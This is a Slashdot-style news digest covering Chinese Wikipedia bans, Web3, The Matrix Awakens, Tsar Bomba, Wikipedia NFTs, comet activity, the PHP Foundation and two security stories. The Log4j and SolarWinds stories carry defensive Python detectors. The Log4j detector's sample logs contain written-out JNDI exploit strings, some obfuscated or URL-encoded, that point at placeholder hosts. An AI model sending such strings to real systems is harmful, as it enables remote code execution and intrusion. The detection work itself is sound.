China

Beatings, Doxxings, Harassment: the War Over Chinese Wikipedia (fastcompany.com) 50

The Wikimedia Foundation banned seven high-level users in September and temporarily demoted a dozen others for abuses "unprecedented in scope and nature." Slashdot reader harrymcc explains: The foundation accused these volunteers of biasing it in favor of the Chinese government's viewpoint. This incident involves beatings, doxxings, and harassment designed to ensure pro-Beijing content.
harrymcc is also technology editor at Fast Company, which got more details from Wikimedia's VP of Community Resilience & Sustainability, Maggie Dennis: Dennis said a monthlong investigation found that the veteran editors were "coordinating to bias the encyclopedia and bias positions of authority" around a pro-Beijing viewpoint, in part by meddling in administrator elections and threatening, and even physically assaulting, other volunteers...

Wikipedians in China have it especially hard, because the government blocks the site and makes accessing it a crime... But as with the dedicated mainland users of blocked apps like Instagram, Telegram, and Twitter, the prohibition hasn't deterred hundreds of volunteers, who tunnel through the Great Firewall with VPNs, and now make up a small but die-hard part of the Chinese Wikipedia community. Despite China's blockade, the site remains one of the ten most active language versions of Wikipedia, thanks largely to growing numbers of editors based in Taiwan and Hong Kong...

[A]mid acute worries over China's influence in both places, the community's mix of users and viewpoints has grown increasingly combustible. In 2014, when mainland editors were in the majority, there were few references to the Hong Kong protests; more recently, swarms of "pro Beijing" editors and "pro democracy" editors have battled over how exactly to depict those and similar events. Were the students at a particular rally in Hong Kong protesters or were they rioters? Is a state-backed news outlet a reliable source?

In some cases, the Foundation found, the fights had spread beyond online harassment into real-life threats, and worse... Dennis says there is no evidence the banned editors were backed by the government...

[U]ntil September, the Foundation had only issued 86 bans since 2012, and typically only one at a time. Suddenly, the Foundation's bans and penalties had knocked out a third of the Chinese edition's administrators.

China "is home to the world's largest population of internet users and to the world's most sophisticated apparatus for policing them," the article notes.

It argues that the banned users "liked to defend Beijing's point of view, but they also liked their influence over the Wiki community; and a pro-China stance allowed them to more easily fly under the government's radar. To protect their fiefdom, they sometimes resorted to personal threats, harassment, and assault." Since the ban, they've now launched a "hard fork" of Chinese Wikipedia which already has 400,000 articles, "tailored to appease government censors so that anyone on the mainland can access it."

The article also explores the possibility of having one global version of Wikipedia, rather than separate local editions.
Java

Security Firm Blumira Discovers Major New Log4j Attack Vector (zdnet.com) 91

Previously, one assumption about the 10 out of 10 Log4j security vulnerability was that it was limited to exposed vulnerable servers. We were wrong. The security company Blumira claims to have found a new, exciting Log4j attack vector. ZDNet reports: According to Blumira, this newly-discovered Javascript WebSocket attack vector can be exploited through the path of a listening server on their machine or local network. An attacker can simply navigate to a website and trigger the vulnerability. Adding insult to injury, WebSocket connections within the host can be difficult to gain deep visibility into. That means it's even harder to detect this vulnerability and attacks using it. This vector significantly expands the attack surface. How much so? It can be used on services running as localhost, which are not exposed to a network. This is what we like to call a "Shoot me now" kind of problem. Oh, and did I mention? The client itself has no direct control over WebSocket connections. They can silently start when a webpage loads. Don't you love the word "silently" in this context? I know I do.

In their proof-of-concept attack, Blumira found that, by using one of the many Java Naming and Directory Interface (JNDI) exploits, they could trigger the vulnerability via a file path URL over a WebSocket connection to machines with an installed vulnerable Log4j2 library. All that was needed to trigger success was a path request that was started on the web page load. Simple, but deadly. Making matters worse, it doesn't need to be localhost. WebSockets allow for connections to any IP. Let me repeat, "Any IP" and that includes private IP space.

Next, as the page loads, it will initiate a local WebSocket connection, hit the vulnerable listening server, and connect out over the identified type of connection based on the JNDI connection string. The researchers saw the most success utilizing Java Remote Method Invocation (RMI), default port 1099, although we are often seeing custom ports used. Simply port scanning, a technique already in the WebSocket hacker handbook, was the easiest path to a successful attack. Making detecting such attacks even harder, the company found "specific patterns should not be expected as it is easy to trigger traffic passively in the background." Then, once an open port to a local service or a service accessible to the host is found, it can drop the JNDI exploit string in path or parameters. "When this happens, the vulnerable host calls out to the exploit server, loads the attacker's class, and executes it with java.exe as the parent process." Then the attacker can run whatever he wants.
Blumira suggests users "update all local development efforts, internal applications, and internet-facing environments to Log4j 2.16 as soon as possible, before threat actors can weaponize this exploit further," reports ZDNet.

"You should also look closely at your network firewall and egress filtering. [...] In particular, make sure that only certain machines can send out traffic over 53, 389, 636, and 1099 ports. All other ports should be blocked." The report continues: "Finally, since weaponized Log4j applications often attempt to call back home to their masters over random high ports, you should block their access to such ports."
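The two defensive angles the report gives, spotting the JNDI lookup string when it lands in a request path or parameter, and restricting which hosts may reach the callback ports 53, 389, 636 and 1099, can both be exercised against sample data. The block below is an added example written for this page; it is not Blumira's or ZDNet's code. The access-log lines, connection records and egress allowlist are constructed here, and the addresses use documentation ranges. It goes a little beyond the text in one respect: Log4j lookups can be URL-encoded or nested (for example `${${lower:j}ndi:...}`), so the detector decodes and collapses those forms before matching, which is a well-known requirement for log-based Log4Shell detection.

```python
import re
from urllib.parse import unquote

# Egress ports named in the report above: DNS (53), LDAP (389), LDAPS (636), RMI (1099).
CALLBACK_PORTS = {53, 389, 636, 1099}

# Log4j lookup forms a detector must see through before matching on "jndi":
# ${lower:x} / ${upper:x} case-folding lookups and ${anything:-x} default values.
INNER_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
INNER_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.IGNORECASE)


def url_decode(text: str, rounds: int = 5) -> str:
    """URL-decode repeatedly until stable; double-encoded payloads are common."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def collapse_lookups(text: str, rounds: int = 5) -> str:
    """Replace innermost case/default lookups with their literal text, innermost first."""
    for _ in range(rounds):
        collapsed = INNER_CASE_LOOKUP.sub(lambda m: m.group(1), text)
        collapsed = INNER_DEFAULT_LOOKUP.sub(lambda m: m.group(1), collapsed)
        if collapsed == text:
            break
        text = collapsed
    return text


def scan_access_log(lines):
    """Return (1-based line number, JNDI scheme) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        decoded = url_decode(line)
        match = JNDI_LOOKUP.search(decoded) or JNDI_LOOKUP.search(collapse_lookups(decoded))
        if match:
            hits.append((number, match.group(1).lower()))
    return hits


def flag_egress(connections, allowed):
    """Return (src, dst, dport) for outbound flows to callback ports from hosts not allowed to use them."""
    return [
        (src, dst, dport)
        for src, dst, dport in connections
        if dport in CALLBACK_PORTS and dport not in allowed.get(src, set())
    ]


# Constructed sample access-log lines (common log format); not real traffic.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [13/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [13/Dec/2021:10:00:02 +0000] "GET /api?q=${jndi:ldap://203.0.113.10:1389/a} HTTP/1.1" 200 17 "-" "curl"',
    '10.0.0.7 - - [13/Dec/2021:10:00:03 +0000] "GET /login HTTP/1.1" 200 33 "-" "${${lower:j}ndi:rmi://203.0.113.10:1099/x}"',
    '10.0.0.8 - - [13/Dec/2021:10:00:04 +0000] "GET /s?x=%24%7Bjndi%3Adns%3A%2F%2Fexample.test%2Fa%7D HTTP/1.1" 404 0 "-" "ua"',
]

# Constructed outbound flow records (src, dst, dport) and the hosts allowed per port.
SAMPLE_CONNECTIONS = [
    ("10.0.0.53", "198.51.100.1", 53),     # the site's resolver, allowed
    ("10.0.0.20", "203.0.113.10", 1099),   # app server talking RMI to the outside
    ("10.0.0.20", "203.0.113.10", 443),    # HTTPS, not a callback port
    ("10.0.0.21", "203.0.113.10", 389),    # LDAP to an external host
]
ALLOWED_EGRESS = {"10.0.0.53": {53}, "10.0.0.2": {389, 636}}

if __name__ == "__main__":
    for number, scheme in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"line {number}: JNDI lookup via {scheme}")
    for src, dst, dport in flag_egress(SAMPLE_CONNECTIONS, ALLOWED_EGRESS):
        print(f"egress violation: {src} -> {dst}:{dport}")
```

Run it as a script and it prints the three JNDI hits (ldap, rmi, dns) and the two egress violations. The egress check only covers the four named ports; the report's point about callbacks over random high ports needs process-aware telemetry (which process opened the socket) rather than port numbers alone.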
The Internet

What Is Web3 and Why Should You Care? (gizmodo.com) 113

Gizmodo's David Nield explains what Web3 is, what it will mean for the future, and how exactly the third-generation internet differs from the first two. An anonymous reader shares an excerpt from his report: Let's cut to the chase: For Web3 evangelists, it's a revolution; for skeptics, it's an overhyped house of cards that doesn't stand up to much scrutiny. [...] As you might remember if you're of a certain age, Web 1.0 was the era of static webpages. Sites displayed news and information, and maybe you had your own little corner of the World Wide Web to show off your personal interests and hobbies. Images were discouraged -- they took up too much bandwidth -- and video was out of the question. With the dawn of the 21st century, Web 1.0 gave way to Web 2.0 -- a more dynamic, editable, user-driven internet. Static was out and webpages became more interactive and app-like (see Gmail, for example). Many of us signed up for social media accounts and blogs that we used to put our own content on the web in vast amounts. Images and video no longer reduced sites to a crawl, and we started sharing them in huge numbers. And now the dawn of Web3 is upon us. People define it in a few different ways, but at its core is the idea of decentralization, which we've seen with cryptocurrencies (key drivers of Web3). Rather than Google, Apple, Microsoft, Amazon, and Facebook (sorry, Meta) hoarding everything, the internet will supposedly become more democratized.

Key to this decentralization is blockchain technology, which creates publicly visible and verifiable ledgers of record that can be accessed by anyone, anywhere. The blockchain already underpins Bitcoin and other cryptocurrencies, as well as a number of fledgling technologies, and it's tightly interwoven into the future vision of everything that Web3 promises. The idea is that everything you do, from shopping to social media, is handled through the same secure processes, with both more privacy and more transparency baked in. In some ways, Web3 is a mix of the two eras that came before it: The advanced, dynamic, app-like tech of the modern web, combined with the decentralized, user-driven philosophy that was around at the start of the internet, before billion- and trillion-dollar corporations owned everything. Web3 shifts the power dynamic from the giant tech entities back to the users -- or at least that's the theory.

In its current form, Web3 rewards users with tokens, which will eventually be used in a variety of ways, including currency or as votes to influence the future of technology. In this brave new world, the value generated by the web will be shared out between many more users and more companies and more services, with much-improved interoperability. NFTs are closely linked to the Web3 vision. [...] For our purposes here, the link between cryptocurrencies, NFTs, and Web3 is the foundation: the blockchain. Throw in some artificial intelligence and some machine learning to do everything from filter out unnecessary data to spot security threats, and you've got just about every emerging digital technology covered with Web3. Right now Ethereum is the blockchain attracting the most Web3 interest (it supports both a cryptocurrency and an NFT system, and you can do everything from make a payment through it to build an app on it).

The Matrix

'Matrix' Stars Discuss Free 'Matrix Awakens' Demo Showing Off Epic's Unreal Engine 5 (theverge.com) 34

This year's Game Awards also saw the premiere of The Matrix Awakens, a new in-world "tech demonstrator" written by Lana Wachowski, the co-writer/director of the original Matrix trilogy and director of the upcoming sequel. It's available free on the PS5 and Xbox Series X/S, reports The Verge, and they also scored a sit-down video interview with Keanu Reeves and Carrie-Anne Moss about the new playable experience — and the new Matrix movie: Reeves also revealed that he thinks there should be a modern Matrix video game, that he's flattered by Cyberpunk 2077 players modding the game to have sex with his character, and why he thinks Facebook shouldn't co-opt the metaverse.

Apart from serving as a clever promotion vehicle for the new Matrix movie premiering December 22nd, The Matrix Awakens is designed to showcase what's possible with the next major version of Epic's Unreal Engine coming next year. It's structured as a scripted intro by Wachowski, followed by a playable car chase scene and then an open-world sandbox experience you can navigate as one of Epic's metahuman characters. A big reason for doing the demo is to demonstrate how Epic thinks its technology can be used to blend scripted storytelling with games and much more, according to Epic CTO Kim Libreri, who worked on the special effects for the original Matrix trilogy...

Everything in the virtual city is fully loaded no matter where your character is located (rather than rendered only when the character gets near), down to the detail of a chain link fence in an alley. All of the moving vehicles, people, and lighting in the city are generated by AI, the latter of which Libreri describes as a breakthrough that means lighting is no longer "this sort of niche art form." Thanks to updates coming to Unreal Engine, which powers everything from Fortnite to special effects in Disney's The Mandalorian, developers will be able to use the same, hyper-realistic virtual assets across different experiences. It's part of Epic's goal to help build the metaverse.

Elsewhere the site writes that The Matrix Awakens "single-handedly proves next-gen graphics are within reach of Sony and Microsoft's new game consoles." It's unlike any tech demo you've ever tried before. When we said the next generation of gaming didn't actually arrive with Xbox Series X and PS5, this is the kind of push that has the potential to turn that around....

Just don't expect it to make you question your reality — the uncanny valley is still alive and well.... But from a "is it time for photorealistic video game cities?" perspective, The Matrix Awakens is seriously convincing. It's head-and-shoulders above the most photorealistic video game cities we've seen so far, including those in the Spider-Man, Grand Theft Auto and Watch Dogs series... Despite glitches and an occasionally choppy framerate, The Matrix Awakens city feels more real, thanks to Unreal Engine's incredible global illumination and real-time raytracing ("The entire world is lit by only the sun, sky and emissive materials on meshes," claims Epic), the detail of the procedurally generated buildings, and how dense it all is in terms of cars and foot traffic.

And the most convincing part is that it's not just a scripted sequence running in real-time on your PS5 or Xbox like practically every other tech demo you've seen — you get to run, drive, and fly through it, manipulate the angle of the sun, turn on filters, and dive into a full photo mode, as soon as the scripted and on-rails shooter parts of the demo are done. Not that there's a lot to do in The Matrix Awakens except finding different ways to take in the view. You can't land on buildings, there's no car chases except for the scripted one, no bullets to dodge. You can crash any one of the game's 38,146 drivable cars into any of the other cars or walls, I guess. I did a bunch of that before I got bored, though, just taking in the world.... Almost 10 million unique and duplicated assets were created to make the city....

Epic Games' pitch is that Unreal Engine 5 developers can do this or better with its ready-made tools at their disposal, and I can't wait to see them try.

The Military

Revisiting the 'Tsar Bomba' Nuclear Test (arstechnica.com) 143

An anonymous reader quotes a report from Ars Technica: The detonation of the first nuclear bombs over Hiroshima and Nagasaki in August 1945 is seared into our collective memory, and the world has been haunted by the prospect of a devastating nuclear apocalypse ever since. Less well-known but equally significant from a nuclear arms race standpoint was the Soviet Union's successful detonation of a hydrogen "superbomb" in the wee hours of October 30, 1961. Dubbed "Tsar Bomba" (loosely translated, "Emperor of Bombs"), it was the size of a small school bus -- it wouldn't even fit inside a bomber and had to be slung below the belly of the plane. The 60,000-pound (27 metric tons) test bomb's explosive yield was 50 million tons (50 megatons) of TNT, although the design had a maximum explosive yield of 100 million tons (100 megatons).

The US had conducted the first successful test of a hydrogen bomb (codename: Ivy Mike) in 1954 and had been pondering the development of even more powerful hydrogen superbombs. But the Soviets' successful test lent greater urgency to the matter. Ultimately, President John F. Kennedy opted for diplomacy, signing the Partial Nuclear Test Ban Treaty on October 7, 1963. But US nuclear policy -- and, hence, world history -- might have ended up looking very different, according to Alex Wellerstein, a historian of science at the Stevens Institute of Technology in New Jersey and author of Restricted Data: The History of Nuclear Secrecy in the United States, released earlier this year. He also maintains the NUKEMAP, an interactive tool that enables users to model the impact of various types of nuclear weapons on the geographical location of their choice.

Wellerstein has analyzed recently declassified documents pertaining to the US response to Tsar Bomba during the Kennedy administration. He described his conclusions in a fascinating article recently published in the Bulletin of the Atomic Scientists, coinciding with the 60th anniversary of the test. [...] According to Wellerstein, the US initially sought to minimize the significance of the Soviets' success, officially dismissing it as a political publicity stunt with little to no technical or strategic importance. But the declassified files revealed that, behind the scenes, US officials took the matter very seriously indeed. Physicist Edward Teller in particular strongly advocated in favor of developing two even more powerful hydrogen bombs, with yields of 1,000 and even 10,000 megatons, respectively. While much of Teller's testimony at a secret meeting on the topic remains classified, Wellerstein found that many scientists who were present expressed shock at his proposal. Concerns about the practical use of such a massive weapon, particularly the widespread nuclear fallout, ultimately scuttled those plans.
"I found the new information with regard to the US response to Tsar Bomba really interesting, because it contradicts what they said in public versus what was going on behind the scenes," says Wellerstein. "A lot of the discussions about the Tsar Bomba in American writing essentially parrot then-President Kennedy's line without realizing it: 'Oh, these bombs are worthless. No, they can't do it.' But it's clear that there were people within the Kennedy administration who didn't think it was as simple as that. We can be happy that those people didn't win out."

He added: "There is always this temptation for big bombs. I found a memo by somebody at Sandia, talking about meeting with the military. He said that the military didn't really know what they wanted these big bombs for, but they figured that if the Soviets thought they were a good idea, then the US should have one, too. It's reminiscent of that line from Dr. Strangelove."

Ars Technica sat down with Wellerstein to learn more about the Tsar Bomba test. You can read the full article here.
Wikipedia

Wikipedia Editors Very Mad About Jimmy Wales' NFT of a Wikipedia Edit (vice.com) 15

An anonymous reader quotes a report from Motherboard: Wikipedia co-founder Jimmy Wales' auction of an NFT and the iMac he used to build the website has stirred up drama in the notoriously rigid Wikipedia community. The trouble began when Wales posted an announcement about the auction on his user talk page -- a kind of message board where users communicate directly with each other. Wikipedia has strict rules against self-promotion and some editors felt that Wales' announcement violated that rule. "Am I crazy? Jimbo has posted a thread on his user talk page promoting an auction of some of his stuff, which he has refused to confirm would not benefit him personally," editor Floquenbeam said on December 3. "This is self-promotion 101, right? I've told him if he doesn't remove it, I will. That's policy, right?" [...] Wales pushed back, saying he'd spoken to the WMF communications and legal departments and that they'd agreed a simple post about the auction on his user talk page would be fine.

The conversation went on like this for about a day before another editor shut it down, saying it was "past the point of productive discourse." The thread announcing the auction on Wales' talk page was removed but another thread remains where he's answering questions about the auction and NFTs from other users. An email thread on the Wikimedia-L listserv is more measured but still has some of the pedantic arguments that are common with Wikimedia drama. Some users are concerned that he's taking something from Wikimedia and could use the money to fund his commercial enterprise WT:Social. Another user said "The concept of NFT seems to go against the very principles of Wikipedia. On one hand, we share our work freely, both in terms of access and by using a copyleft license. On the other hand, this NFT takes something that was shared freely and then restricts it so that it can be sold." The NFT Wales is selling is a website that allows users to relive the moment of Wikipedia's creation. The site looks like Wikipedia did in its fledgling moments, and whoever wins the auction can edit it as they will.

The second big controversy among Wikipedia's editors was whether Wales had the right to auction off something like this and if he was even recreating the site correctly at the moment of its inception. The discussion devolved into a lengthy conversation about who owns the rights to what they edit on Wikipedia and the state of servers and timestamps from 2001. It's worth mentioning here that Wales' NFT is a recreation of a memory and not an actual editable bit of code that will be reflected on Wikipedia in any way. Eventually, all sides relented. "There is at least one good thing that should be coming out of this," editor Smallbones said. "The community has made it very clear that anything that is considered to be promotional or an advertisement, even if it is for a charitable cause, on any page in Wikipedia, posted by any editor -- even the most senior and most respected -- may be removed by any editor at any time."

Medicine

Giant Study Finds Viagra Is Linked To Almost 70% Lower Risk of Alzheimer's (sciencealert.com) 115

fahrbot-bot shares a report from ScienceAlert: Usage of the medication sildenafil -- better known to most as the brand-name drug Viagra -- is associated with dramatically reduced incidence of Alzheimer's disease, new research suggests. According to a study led by researchers at the Cleveland Clinic, taking sildenafil is tied to a nearly 70 percent lower risk of developing Alzheimer's compared to non-users. That's based on an analysis of health insurance claim data from over 7.2 million people, in which records showed that claimants who took the medication were much less likely to develop Alzheimer's over the next six years of follow up, compared to matched control patients who didn't use sildenafil.

It's important to note that observed associations like this -- even on a huge scale -- are not the same as proof of a causative effect. For example, it's possible that the people in the cohort who took sildenafil might have something else to thank for their improved chances of not developing Alzheimer's. Nonetheless, the researchers say the correlation shown here -- in addition to other indicators in the study -- is enough to identify sildenafil as a promising candidate drug for Alzheimer's disease, the viability of which can be explored in future randomized clinical trials designed to test whether causality does indeed exist.

Security

SolarWinds Hackers Have a Whole Bag of New Tricks For Mass Compromise Attacks (arstechnica.com) 43

An anonymous reader quotes a report from Ars Technica: Almost exactly a year ago, security researchers uncovered one of the worst data breaches in modern history, if not ever: a Kremlin-backed hacking campaign that compromised the servers of network management provider SolarWinds and, from there, the networks of 100 of its highest-profile customers, including nine US federal agencies. Nobelium -- the name Microsoft gave to the intruders -- was eventually expelled, but the group never gave up and arguably has only become more brazen and adept at hacking large numbers of targets in a single stroke. The latest reminder of the group's proficiency comes from security firm Mandiant, which on Monday published research detailing Nobelium's numerous feats -- and a few mistakes -- as it continued to breach the networks of some of its highest-value targets.

Mandiant's report shows that Nobelium's ingenuity hasn't wavered. Since last year, company researchers say the two hacking groups linked to the SolarWinds hack -- one called UNC3004 and the other UNC2652 -- have continued to devise new ways to compromise large numbers of targets in an efficient manner. Instead of poisoning the supply chain of SolarWinds, the groups compromised the networks of cloud solution providers and managed service providers, or CSPs, which are outsourced third-party companies that many large companies rely on for a wide range of IT services. The hackers then found clever ways to use those compromised providers to intrude upon their customers.
The advanced tradecraft didn't stop there. According to Mandiant, other advanced tactics and ingenuities included:
  • Use of credentials stolen by financially motivated hackers using malware such as Cryptbot (PDF), an information stealer that harvests system and web browser credentials and cryptocurrency wallets. The assistance from these hackers allowed the UNC3004 and UNC2652 to compromise targets even when they didn't use a hacked service provider.
  • Once the hacker groups were inside a network, they compromised enterprise spam filters or other software with "application impersonation privileges," which have the ability to access email or other types of data from any other account in the compromised network. Hacking this single account saved the hassle of having to break into each account individually.
  • The abuse of legitimate residential proxy services or geo-located cloud providers such as Azure to connect to end targets. When admins of the hacked companies reviewed access logs, they saw connections coming from local ISPs with good reputations or cloud providers that were in the same geography as the companies. This helped disguise the intrusions, since nation-sponsored hackers frequently use dedicated IP addresses that arouse suspicions.
  • Clever ways to bypass security restrictions, such as extracting virtual machines to determine internal routing configurations of the networks they wanted to hack.
  • Gaining access to an active directory stored in a target's Azure account and using this all-powerful administration tool to steal cryptographic keys that would generate tokens that could bypass two-factor authentication protections. This technique gave the intruders what's known as a Golden SAML, which is akin to a skeleton key that unlocks every service that uses the Security Assertion Markup Language, which is the protocol that makes single sign-on, 2FA, and other security mechanisms work.
  • Use of a custom downloader dubbed Ceeloader.
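The Golden SAML bullet above is the one a defender can least address with signature checks: an assertion forged with the stolen token-signing key validates perfectly at every service provider. What does reveal it is the identity provider's own audit trail, because the IdP never issued the assertion the service provider accepted. The block below is an added example, not code from Mandiant or from the Ars Technica report, that correlates a service-provider acceptance log against an IdP issuance log and reports assertions the IdP has no record of. Both log formats ("timestamp event key=value ...") and all the records are constructed for this example; a real deployment would map the same fields from the IdP's audit events (for AD FS, its token-issuance audit log) and the application's SAML acceptance log.

```python
import re
from datetime import datetime, timedelta

# Constructed record shape used by both sides: "<ISO-8601 UTC time> <event> key=value ...".
RECORD = re.compile(r"^(?P<ts>\S+)\s+(?P<event>\w+)\s+(?P<kv>.*)$")


def parse_record(line: str) -> dict:
    """Parse one log line into a dict with 'ts', 'event' and the key=value fields."""
    match = RECORD.match(line.strip())
    if not match:
        raise ValueError(f"unparseable record: {line!r}")
    record = {
        "ts": datetime.strptime(match["ts"], "%Y-%m-%dT%H:%M:%SZ"),
        "event": match["event"],
    }
    record.update(re.findall(r"(\w+)=(\S+)", match["kv"]))
    return record


def find_suspect_assertions(idp_lines, sp_lines, max_skew=timedelta(minutes=5)):
    """Return (assertion_id, subject, reason) for accepted assertions the IdP cannot vouch for.

    Three conditions are reported: the IdP has no issuance record for the assertion ID
    (the Golden SAML signature), the subject differs from the one the IdP issued it to,
    or the service provider accepted it before the IdP issued it (beyond clock skew).
    """
    issued = {}
    for line in idp_lines:
        rec = parse_record(line)
        if rec["event"] == "issued":
            issued[rec["assertion_id"]] = rec

    findings = []
    for line in sp_lines:
        rec = parse_record(line)
        if rec["event"] != "accepted":
            continue
        origin = issued.get(rec["assertion_id"])
        if origin is None:
            findings.append((rec["assertion_id"], rec["subject"], "no issuance record at the IdP"))
        elif origin["subject"] != rec["subject"]:
            findings.append((rec["assertion_id"], rec["subject"], "subject differs from the issued assertion"))
        elif rec["ts"] + max_skew < origin["ts"]:
            findings.append((rec["assertion_id"], rec["subject"], "accepted before it was issued"))
    return findings


# Constructed IdP audit log: what the identity provider actually issued.
IDP_LOG = [
    "2021-12-06T09:00:00Z issued assertion_id=_a1 subject=alice@corp.example mfa=true",
    "2021-12-06T09:05:00Z issued assertion_id=_a2 subject=bob@corp.example mfa=true",
    "2021-12-06T09:06:00Z validated subject=bob@corp.example method=password",
]

# Constructed service-provider log: every assertion whose signature verified and was accepted.
SP_LOG = [
    "2021-12-06T09:00:02Z accepted assertion_id=_a1 subject=alice@corp.example src=198.51.100.4",
    "2021-12-06T09:05:03Z accepted assertion_id=_a2 subject=bob@corp.example src=198.51.100.4",
    "2021-12-06T09:07:00Z accepted assertion_id=_f0rg3d subject=admin@corp.example src=203.0.113.77",
    "2021-12-06T08:30:00Z accepted assertion_id=_a2 subject=bob@corp.example src=203.0.113.77",
]

if __name__ == "__main__":
    for assertion_id, subject, reason in find_suspect_assertions(IDP_LOG, SP_LOG):
        print(f"{assertion_id} for {subject}: {reason}")
```

Two things follow from the design. The IdP log is the ground truth here, so its integrity and retention matter as much as the token-signing key itself, and an intruder with the access described above could tamper with it. And the correlation only works where the service provider logs the assertion ID it accepted, which is worth confirming before relying on this detection.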

DRM

FSF's Anti-DRM Campaign Plans Bad-Review Protest Against Disney+ (fsf.org) 76

For their fifteenth International Day Against DRM this Friday, the Free Software Foundation's "Defective by Design" campaign is "calling on you to help us send a message to purveyors of Digital Restrictions Management (DRM)".

And this year they're targeting Disney+: The ongoing pandemic has only tightened the stranglehold streaming services have as some of the most dominant forms of entertainment media, and Disney+ is among the worst of them. After years of aggressive lobbying to extend the length of copyright, based on their perceived need to keep a certain rat from entering the public domain, they've now set their sights on "protecting" their various franchises in a different way: by shackling them with digital restrictions. If Disney's stated mission is to keep "inspiring hope and sparking the curiosity of all ages", using DRM to limit that curiosity remains the wrong move.

This year, we'll be using one of Disney's own means of spreading their "service" and the DRM bundled with it: their mobile app. If you're an existing user of the Google Play (Android) or Apple App Stores, you can support the International Day Against DRM by voicing your objection to Disney's subjugation of their users. Streaming services like Netflix and Peacock have the same issues, but by targeting a newer one with such massive investment and capital behind it, we can make sure that we're heard. Disney+ is new: that gives it time to change.

Disney+ is placed near the top of the most frequently downloaded apps on both the Google Play and Apple App Stores. We invite you to write a well-thought objection to Disney's use of DRM, with a fitting review. It is the perfect way to let the corporation, and other users intending to use its services, know Disney's grievous mistake in using DRM to restrict customers who already want to view their many films and television shows. It will give you a chance to give them the exact rating that any service that treats its users so poorly deserves: a single star.

DRM isn't the only problem with the Disney+ app. It's also nonfree software. If you're not already an Android or iOS user, we don't recommend starting an account just to participate in this action. You can also choose to send an email to Disney executives following our template.

They're urging supporters to also share the actions they've taken on social media using the tag #DayAgainstDRM. (And there's also an IRC channel "to discuss and share strategies for anti-DRM activism," with more anti-DRM actions still to come.)

"While some aspects of the struggle have changed, the core principles remain the same: users should not be forced to surrender their digital autonomy in exchange for media."
Wikipedia

Jimmy Wales is Selling His First Wikipedia Edit as an NFT (theverge.com) 21

Wikipedia co-founder Jimmy Wales is selling a non-fungible token (or NFT) based on his first edit of the free encyclopedia. From a report: Auction house Christie's will hold a sale of the token from December 3rd to 15th, auctioning it alongside the Strawberry iMac Wales was using around Wikipedia's launch. The funds will go toward charitable causes and WT.Social, a donation-backed social network that Wales launched in 2019. Wales' NFT is effectively the keys to a very early version of Wikipedia, which debuted in January of 2001.

"What you see displayed is what Wikipedia looked like at the moment that I set up the software," he tells The Verge. The single page will be launched publicly on the web, and much like Wikipedia itself, anyone will be able to see and edit it. But all changes will revert after five minutes, returning it to its original state: a single edit reading "Hello, World!" following a long-held tradition of programming. The NFT, which is written to the Ethereum blockchain, encodes a smart contract that grants its buyer control over that website. The buyer can change the window for reverting edits, and if they really want, they can turn off editing or shut down the page. They can also take a completely hands-off approach and let Wales manage the page for them.

Space

The Largest Comet We've Ever Seen Just Delivered a Curious Surprise (sciencealert.com) 18

schwit1 shares a report from ScienceAlert: The comet Bernardinelli-Bernstein (BB) -- the largest our telescopes have ever spotted -- is on a journey from the outer reaches of our Solar System that will see it flying relatively close to Saturn's orbit. Now, a new analysis of the data we've collected on BB has revealed something rather surprising. Digging into readings logged by the Transient Exoplanet Survey Satellite (TESS) between 2018 and 2020, researchers have discovered that BB became active much earlier, and much farther out from the Sun, than was previously thought.

A comet becomes active when light from the Sun heats its icy surface, turning ice to vapor and releasing trapped dust and grit. The resulting haze, called a coma, can be useful for astronomers in working out exactly what a particular comet is made out of. In the case of BB, it's still too far out for water to sublimate. Based on studies of comets at similar distances, it's likely that the emerging fog is driven instead by a slow release of carbon monoxide. Only one active comet has previously been directly observed at a greater distance from the Sun, and it was much smaller than BB.
"These observations are pushing the distances for active comets dramatically farther than we have previously known," says astronomer Tony Farnham, from the University of Maryland (UMD). "We make the assumption that comet BB was probably active even farther out, but we just didn't see it before this. What we don't know yet is if there's some cut-off point where we can start to see these things in cold storage before they become active."

The research has been published in the Planetary Science Journal.
Open Source

Addressing 'Bus Factor', PHP Gets a Foundation (thenewstack.io) 69

How many members of your team are so irreplaceable that if they were hit by a bus, your project would grind to a halt?

For PHP, that number is: two. (According to a post by PHP contributor Joe Watkins earlier this year that's now being cited in Mike Melanson's "This Week in Programming" column.) "Maybe as few as two people would have to wake up this morning and decide they want to do something different with their lives in order for the PHP project to lack the expertise and resources to move it forward in its current form, and at current pace," Watkins wrote at the time, naming Dmitry Stogov and Nikita Popov as those two. Well, last week, Nikita Popov was thankfully not hit by a bus, but he did decide to move on from his role with PHP to instead focus his activities on LLVM.

Also thankfully, Watkins' article earlier this year opened some eyes to the situation at hand and, as he writes in a follow-up article this week, JetBrains (Popov's employer) reached out to him at the time regarding starting a PHP Foundation. This week, with Popov's departure, the PHP Foundation was officially launched with the goal of funding part/full-time developers to work on the PHP core in 2022. At launch, the PHP Foundation will count 10 companies — Automattic, Laravel, Acquia, Zend, Private Packagist, Symfony, Craft CMS, Tideways, PrestaShop, and JetBrains — among its backers, with an expectation to raise $300,000 per year, and with JetBrains contributing $100,000 annually. Alongside that, the foundation is being launched using foundation-as-a-service provider Open Collective, and just under 700 contributors have already raised more than $40,000 for the foundation.

One of the key benefits to creating a foundation, rather than sticking with the status quo, goes beyond increasing the bus factor — it diversifies the influences on PHP. Watkins points out that, for much of the history of PHP, Zend, the employer of Dmitry Stogov, has been a primary financial backer, and as such has had some amount of influence on the language's direction. Similarly, JetBrains had increased influence during its time employing Popov on PHP. "To say they have not influenced the direction of the language as a whole would just not be true...." While Watkins says that everything has been above board and gone through standard processes to ensure so, influence is nonetheless indisputable, and that "The Foundation represents a new way to push the language forward..."

The current RFC process, JetBrains writes, "will not change, and language decisions will always be left to the PHP Internals community."

And in addition, Watkins adds, "It provides us the mechanism by which to raise the bus factor, so that we never face the problems we face today, and have faced in the past."
Medicine

